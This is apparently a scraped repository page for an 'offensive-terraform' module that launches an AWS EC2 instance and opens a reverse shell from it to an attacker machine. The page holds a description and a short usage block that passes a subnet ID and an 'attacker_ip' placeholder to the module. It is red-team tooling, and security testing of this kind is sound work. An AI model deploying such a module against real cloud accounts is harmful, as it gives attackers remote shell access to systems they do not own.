offensive-terraform / terraform-aws-ec2-instance-reverse-shell

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Home Page:https://registry.terraform.io/modules/offensive-terraform/ec2-instance-reverse-shell/aws

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

AWS EC2 Instance Reverse Shell Module

OffensiveTerraform OffensiveTerraform OffensiveTerraform

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

Attack Diagram

Usage

module "ec2-instance-reverse-shell" {
    source  = "offensive-terraform/ec2-instance-reverse-shell/aws"

    subnet_id = "subnet-0a4a1cc04"
    attacker_ip = "0.0.0.0"
}

Author

Module managed by https://github.com/iganbold

About

Offensive Terraform module which creates EC2 instance and reverse shell from an EC2 instance to attacker machine.

https://registry.terraform.io/modules/offensive-terraform/ec2-instance-reverse-shell/aws

License:Apache License 2.0


Languages

Language:HCL 89.2%Language:Shell 10.8%